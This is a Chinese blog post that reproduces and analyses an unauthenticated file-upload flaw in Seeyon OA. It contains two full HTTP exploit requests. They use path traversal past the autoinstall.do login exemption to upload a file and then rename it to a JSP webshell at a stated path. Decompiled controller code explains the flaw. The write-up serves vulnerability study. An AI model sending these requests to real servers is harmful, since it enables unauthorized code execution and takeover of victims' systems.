最新致远OA文件上传漏洞深度分析与扩展

已于 2024-08-14 11:21:35 修改
阅读量565 收藏 15
点赞数 14
文章标签: web安全 网络安全 安全 java
于 2024-08-14 10:56:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63217130/article/details/141185113
版权

加微信即可加入WingBy交流群 (不存在娱乐化)一个可以交流CTF、WEB、内网、免杀、红队、蓝队、java/php代码审计、逆向、云安全、CNVD、证书挖掘的交流群..........

图片

漏洞复现

首先复现一下漏洞

POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100
Content-Length: 3502

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="type"


------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="extensions"

png
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="applicationCategory"


------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="destDirectory"


------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="destFilename"


------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="maxSize"


------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="isEncrypt"

false
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file1"; filename="1.png"
Content-Type: Content-Type: application/pdf


webshell
------WebKitFormBoundary7MA4YWxkTrZu0gW--

图片

POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100
Content-Length: 65

method=uploadMenuIcon&fileid=-2**********&filename=bb.jsp

图片

最终访问 /seeyon/main/menuIcon/shell.jsp  即可

代码分析

为什么两个请求都要用到目录穿越?

这里表示用于所有以 /autoinstall.do 开头的请求。

<not_need_logon>标签,顾名思义就说不需要登录。

所以做目录穿越的时候都是使用的/seeyon/autoinstall.do

图片

试试其他的可不可以呢 首先不目录穿越是这样的

图片

而使用了genericController.do是这样的

图片

这和autoinstall.do是一模一样的

图片

所以不止是autoinstall.do可以。

那么这里为啥要用目录穿越了,了解java权限绕过的师傅们应该知道。在filter处理时,逻辑是只要是autoinstall.do开头的就不需要登录,那么payload中/seeyon/autoinstall.do/../../seeyon/privilege/menu.do是autoinstall.do开头,所以满足条件任务不需要登录也可访问(/seeyon是bashurl)。

所以两个请求都用到目录穿越是为了绕过鉴权验证,达到未授权的效果。

分析两次请求

分析第一个请求 在配置文件中找到处理fileupload.do的类是FileUploadController类

图片

这样就定位到了处理fileupload.do对应的控制器了

图片

先看代码首位

ModelAndView modelAndView = new ModelAndView("ctp/common/fileUpload/upload");
...................
................................
...................
return modelAndView;

分别是创建了一个视图,试图的路径是ctp/common/fileUpload/upload.jsp,也就是文件上传时候那个jsp  如图位置

图片

在控制器中,这里 进行了文件上传处理 前面都是一些其他逻辑处理 跟进去看看

图片

发现改接口有一个实现类

图片

实现类调用了uploadFiles函数

图片

这里才是真正的处理实现

图片

对于后缀的判断处理代码如下  可以看到判断后缀还是毕竟严格 是将jsp当作了黑名单  所以第一个请求仅仅是上传了一个png

图片

竟然只是将jsp列入了黑名单,那是不是可以上传html打xss呢  

试试看 还真是上传成功了 所以确实只是不能上传jsp,其他都可以正常上传的

图片

文件上传看完了,再来看看关键的第二次请求。可以看到第二次请求是对之前上传的文件进行名称修改,让它变成webshell

第二请求是menu.do 对于处理的控制器如图是MenuController

图片

控制器中有一个  method=uploadMenuIcon

图片

复制关键代码方便查看

File file = fileManager.getFile(Long.valueOf(Long.parseLong(request.getParameter("fileid"))), new Date());
        String filePath = (new StringBuilder(String.valueOf(AppContext.getSystemProperty("ApplicationRoot")))).append(File.separator).append("main").append(File.separator).append("menuIcon").append(File.separator).toString();
        File rootDirectory = new File(filePath);
        if(!rootDirectory.exists())
            rootDirectory.mkdirs();
        String fielName = request.getParameter("filename");
        File fileNew = new File((new StringBuilder(String.valueOf(filePath))).append(fielName).toString());
        if(!fileNew.exists())
            fileNew.createNewFile();
        java.io.InputStream in = new FileInputStream(file);
        java.io.OutputStream out = new FileOutputStream(fileNew);

可以看到根据fileid获取file,然后filepath是文件落地的路径,通过拼接发现最终落地的位置是/main/menuIcon加上/seeyon也就是/seeyon/main/menuIcon,而创建的文件的名字是filename,是没有进行任何过滤的,所以可以是jsp后缀文件。

关键就说这个fileid,我们回想一下第一个请求的代码中是不是也有个fileid

图片

然后在processupload中有这段代码

图片

att是一个Attachment对象 看看这个对象长啥样

图片

可以看到有fileUrl = file.getId(); 这个getId其实就说获取fileid也就是前面那个uuid,在jsp中也就是fileurl

图片

所以第二个请求中的fileid,其实就是第一个请求中返回的fileUrl

图片

这里这个漏洞所有的地方就分析结束了

Ting丶丶
关注
  • 14
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
致远OA getAjaxDataServlet XXE漏洞复现(QVD-2023-30027)
0xSec
01-08 4380
致远互联-OA getAjaxDataServlet 接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
【1day】致远 A8系统getAjaxDataServlet-xxe接口任意文件读取学习
记录并分享学习安全的知识点..
12-05 1824
致远 A8+ OA(Office Automation)是由中国致远软件开发的一套综合性办公自动化软件解决方案,Office Automation基于B/S架构(浏览器/服务器架构)的企业级应用软件,旨在帮助企业实现高效的办公管理和信息化建设。致远 A8系统getAjaxDataServlet-xxe接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件。
致远OA文件上传漏洞(含批量检测POC)
最新发布
Innocence_0的博客
07-07 1134
漏洞描述* 漏洞描述文章内容仅供学习参考请勿用于非法用途。
xxe 漏洞分析
rnn0921的博客
08-23 483
XXE(XML External Entity Injection)xml 外部实体注入漏洞是一种攻击方式,主要针对使用 XML 解析器的应用程序。该漏洞的影响范围取决于应用程序中使用的 XML 解析器以及其配置。XXE 漏洞发生在引用程序解析 XML 输入时,没用禁止外部实体的加载,导致可加载外部恶意文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 dos 攻击等危害。
漏洞复现】致远互联 OA fileUpload.do 文件上传漏洞
qq_34914659的博客
06-18 1229
致远OA是一款企业级办公自动化软件,提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公,提高工作效率和协同能力。该系统fileUpload.do存在文件上传漏洞
致远OA任意文件上传
Dalian0的博客
11-03 5261
漏洞影响泛微: 致远OA V8.0 致远OA V7.1、V7.1SP1 致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3 致远OA V6.0、V6.1SP1、V6.1SP2 致远OA V5.x 致远OA G6 搭建环境测试: 漏洞验证: 访问/seeyon/autoinstall.do/..;/ajax.do出现下图异常,存在漏洞 抓包修改数据包 POC: POST /seeyon/autoinstall.do.css/..;/ajax.do?method=.
致远OA-ajax.do未授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在未授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
致远OA上传文件、附件方法
04-02
总之,通过Java代码与致远OA系统交互,可以实现文件的上传,并获取到对应的附件ID,从而在表单提交时引用这些文件。这要求开发者对HTTP请求、文件处理、JSON解析以及具体的OA系统API有深入的理解。在实际操作中,应...
致远OA V8.1SP1数据字典(2023年最新
10-08
在IT行业中,协同办公系统是企业提升效率、优化工作流程的关键工具之一,而致远OA则是这类系统中的知名产品。本文将围绕“致远OA V8.1SP1数据字典”这一主题,深入探讨其数据库设计和相关知识点。 首先,我们需要...
MAC可视化-致远OA漏洞全版本扫描工具v1.0.1
02-14
致远OA漏洞全版本扫描工具v1.0.1
致远OA与帆软BI单点登录配置方法
10-18
### 致远OA与帆软BI单点登录配置方法 #### 一、引言 在当前信息化快速发展的背景下,企业内部通常会部署多种业务系统来支撑日常运营与管理。为了提高工作效率并提升用户体验,实现不同系统间的单点登录(Single ...
漏洞复现】致远互联OA fileUpload.do 任意文件上传漏洞
qq_67810151的博客
04-09 916
致远互联OA fileUpload.do接口处存在文件上传漏洞,未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制,并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器,获取服务器权限。
【nday】HVV 致远OA漏洞合集
伏一
05-27 3952
然后调用未授权的文件上传接口上传webshell文件,webshell地址: /seeyon/apps_res/addressbook/images/config.jspx。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。app="致远互联-OA" && title="V8.0SP2"body="yyoa" && app="致远互联-OA"title="致远A8+协同管理软件.A6"
致远OA wpsAssistServlet任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
10-31 1065
致远互联oa办公自动化软件系统,实现企业审批/报销/门户/公文/文档/采购/费用等综合管理,致远互联oa办公自动化软件系统,满足企业一体化办公需求。该系统wpsAssistServlet存在任意文件读取漏洞
致远OA任意管理员登陆漏洞分析
swordheart的博客
07-08 3989
随着中国最大的安全产品性能检测以及人体体能极限挑战活动的到来,各路大佬都八仙过海各显神通。同时大量的0day被公开,排除那些被辟谣的,还有很多值得学习的漏洞致远这是个组合漏洞,首先任意管理员登陆,然后后台getshell。因为前台漏洞相对来说危害较高,这里着重分析下前台这个漏洞致远oa使用spring的自动装配,通过在xml文件中搜索漏洞url中的,可以快速定位到漏洞类。 根据exp找到存在问题的方法。 找到该方法后基本上可以一眼看到漏洞点了,在该方法的最下方,这里的memberId是可控的。首先通过
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
致远OA-ajax.do未授权文件上传漏洞复现
qq_52469895的博客
04-11 8586
打开网站 任何测试它有没有未授权文件上传 http://xxx/seeyon/thirdpartyController.do.css/…;/ajax.do 通过抓取数据包,可以看到如下的数据请求和返回结构: 返回状态404返回notfound 然后直接poc这个jspx的马是在网上找到 http://x.x.x.x/seeyon/autoinstall.do/..;/ajax.do?method=ajaxAction&managerName=formulaManage
致远OA文件上传漏洞
07-29
致远OA存在文件上传漏洞,攻击者可以通过调用文件上传接口上传恶意文件,从而执行任意系统命令并控制目标服务器。\[2\]\[3\]该漏洞影响范围包括致远OA V8.0、V7.1、V7.0、V6.0、V6.1以及致远OA G6等版本。\[1\]攻击者可以通过构造精心设计的数据向目标服务器写入任意文件,并在写入成功后执行任意系统命令。这个漏洞的危害性非常高,因此建议用户及时升级致远OA的版本或者采取其他安全措施来防止此漏洞的利用。 #### 引用[.reference_title] - *1* [致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现](https://blog.csdn.net/qq2539879928/article/details/127811719)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现](https://blog.csdn.net/qq2539879928/article/details/127811791)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现](https://blog.csdn.net/qq2539879928/article/details/127811833)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值